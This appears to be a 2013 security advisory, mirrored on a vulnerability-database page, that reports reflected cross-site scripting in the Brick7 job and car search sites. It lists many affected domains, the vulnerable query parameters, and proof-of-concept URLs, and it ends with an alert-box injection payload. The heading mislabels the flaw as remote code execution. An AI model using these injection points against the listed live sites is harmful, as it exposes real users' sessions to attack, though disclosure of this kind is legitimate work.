Brick7 Search Engine Cross Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044624 漏洞类型
发布时间 2013-08-08 更新时间 2013-08-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013080068
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
===========================================================
 ? brick7 2013   Remote code execution  XSS            
===========================================================


Author():Raul Diaz(Dshellnoi Unix) 

Product: Brick7 search engine
Web:http://www.brick7.com
Versions: N/A
Date: 01/06/2013
Vendor Notified: 1/06/2013 | 2/07/2013


Extract:

http://www.brick7.com

Brick7 is a search engine for jobs, allowing job seekers to find jobs posted on
thousands of company career sites and job boards. 
Brick7 maps the huge selection of job offerings available on the Internet in one 
extensive database by referencing job listings originating from company websites,
recruitment agency websites and large specialist recruitment sites.

Brick7.Com was founded in 2007 with the aim of radically improving on-line job search.
 The company was quickly recognized as an industry leader both in trade and business media.


Sites affected  (1)
--------------------
www.brick7.es
http://www.brick7.com/
http://www.brick7.co.za/
http://uae.brick7.net/
http://qa.brick7.net/
http://kw.brick7.net/
http://om.brick7.net/
http://tr.brick7.net/
http://tr.brick7.net/
http://tw.brick7.net/
http://my.brick7.net/
http://ph.brick7.net/
http://www.brick7.in/
http://www.brick7.co.nz/
http://www.brick7.com.au/
http://www.brick7.co.za/
http://www.brick7.com.pe/
http://www.brick7.cl/
http://www.brick7.com.ar/
http://www.brick7.com.br/
http://www.brick7.com.co/
http://www.brick7.co.ve/
http://www.brick7.com.mx/
http://canada.brick7.net/
http://www.brick7.fr/
http://www.brick7.ch/
http://www.brick7.ro/
http://www.brick7.pl/
http://www.brick7.it/
http://www.brick7.de/
http://ie.brick7.net/
http://www.brick7.nl/
http://www.brick7.pt/
http://www.brick7.co.uk/

[parameters affected]
q=

[P.o.c]
http://www.brick7.com/search/jobs?q=[INJECT HERE]&l=

http://www.freeimagehosting.net/a7rzj
------------------------------------------------------


Sites affected  (2)
--------------------
http://cars.brick7.com/
http://carros.brick7.co.ve/
http://coches.brick7.es/
http://autos.brick7.de/
http://auto.brick7.it/
http://masini.brick7.ro/
http://voiture.brick7.fr/
http://cars.brick7-ie.com/
http://autos.brick7.nl/
http://cars.brick7-ca.com/
http://cars.brick7.co.za/
http://cars.brick7.com.au/

[parameters affected]
q=
make=
model=
yfrom=
yto=
pfrom=
pto=
mfrom=
mto=

[P.o.c]

http://cars.brick7.com.au/search?q=[INJECT HERE]&make=[INJECT HERE]&model=[INJECT HERE]&yfrom=[INJECT HERE]
&yto=[INJECT HERE]&pfrom=[INJECT HERE]&pto=[INJECT HERE]&mfrom=[INJECT HERE]&mto=[INJECT HERE]&search=Search

http://www.freeimagehosting.net/z9uvo
-------------------------------------------------------------------------------------------------------


REMOTE INJECTION CODE:
---------------------------

"><img src="image.gif" onerror="alert(1)">


Remediation:
------------
Sanitize all parameters affected

|templesec.org 2011-2013 (templesec0day@gmail.com)|